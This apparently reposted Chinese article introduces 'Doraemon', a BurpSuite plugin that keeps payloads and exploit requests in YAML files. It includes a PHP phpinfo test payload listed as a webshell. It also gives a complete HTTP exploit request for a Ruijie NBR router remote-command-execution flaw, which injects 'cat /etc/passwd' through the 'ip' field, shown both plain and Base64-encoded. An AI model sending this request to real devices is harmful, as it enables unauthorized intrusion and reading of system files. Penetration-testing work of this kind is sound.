BurpSuite渗透辅助插件 -- Doraemon
2023-1-27 08:5:14 Author: Web安全工具库(查看原文) 阅读量:37 收藏

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

在复现一些Http 请求的漏洞,每次都需要在笔记复制exp或写个简单的 python 脚本觉得太麻烦了,如果在 Burpsuite 中直接修改请求包就简单多了。

0x02 安装与使用

1、加载插件初始化的配置文件会放在的/用户根目录/.config/DAM/目录下。

2、使用 vscode 来修改 exp.yaml , payload.yaml 和 tools.yaml (yaml 语法)

DAM:|_exp.yaml|_payload.yaml|_tools.yaml|_temp.req (单独启动的时候用来保存 request 请求)

3、payload.yaml

该文件是把 Payload 插入到 数据包 中 (在文件上传的时候快速插入webshell,不用再生成或者翻文件来复制粘贴了)

<?php phpinfo();?>

4、需要把 payload Base64 编码

PD9waHAgcGhwaW5mbygpOz8+
WebShell:  蚁剑:    PHP:      PD9waHAgcGhwaW5mbygpOz8+

5、exp.yaml

获取 host 和 Cookie 修改整个数据包(如果 Repeater 没有 Target 就使用不了)

host 和 cookie 的位置使用占位符 %s , 如果是未授权的就不需要 cookie。

POST /guest_auth/guestIsUp.php HTTP/1.1 Host: %sConnection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Cookie: %sContent-Type: application/x-www-form-urlencoded Content-Length: 56 
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt

然后把 exp Base64编码

UE9TVCAvZ3Vlc3RfYXV0aC9ndWVzdElzVXAucGhwIEhUVFAvMS4xIApIb3N0OiAlcwpDb25uZWN0aW9uOiBjbG9zZSBVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxIApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODUuMC40MTgzLjEyMSBTYWZhcmkvNTM3LjM2IApDb29raWU6ICVzCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIApDb250ZW50LUxlbmd0aDogNTYgCgptYWM9MSZpcD0xMjcuMC4wLjF8Y2F0IC9ldGMvcGFzc3dkID4gdGVzdC50eHQ=

编写 exp.yaml(yaml 语法)

设备漏洞:  锐捷漏洞:    锐捷NBR路由器-前台RCE:      UE9TVCAvZ3Vlc3RfYXV0aC9ndWVzdElzVXAucGhwIEhUVFAvMS4xIApIb3N0OiAlcwpDb25uZWN0aW9uOiBjbG9zZSBVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxIApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODUuMC40MTgzLjEyMSBTYWZhcmkvNTM3LjM2IApDb29raWU6ICVzCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIApDb250ZW50LUxlbmd0aDogNTYgCgptYWM9MSZpcD0xMjcuMC4wLjF8Y2F0IC9ldGMvcGFzc3dkID4gdGVzdC50eHQ=

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、关注公众号web安全工具库,后台回复:工具666

3、每日抽奖送书

· 推 荐 阅 读 ·

本书是一部Android开发的实战教程,由浅入深、由基础到高级,带领读者一步一步走进App开发的神奇世界。全书共分为20章。其中,前10章是基础部分,主要讲解Android Studio的环境搭建、App开发的各种常用控件、App开发的四大组件、App的数据存储方式、如何打造App的安装包;后10章是进阶部分,主要讲解App开发的事件交互、动画特效、网络通信、多媒体、手机阅读、感知定位、物联网、智能语音、机器视觉、在线直播等。书中在讲解知识点的同时给出了大量实战范例,方便读者迅速将所学的知识运用到实际开发中。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247507334&idx=1&sn=5bd0bc2b6afc96ac1131ef9c7af57cd4&chksm=ebb53285dcc2bb93cb50345483c3070e976ebfcf8048ed6002abfe8e4b432aed40e76939232c#rd
如有侵权请联系:admin#unsafe.sh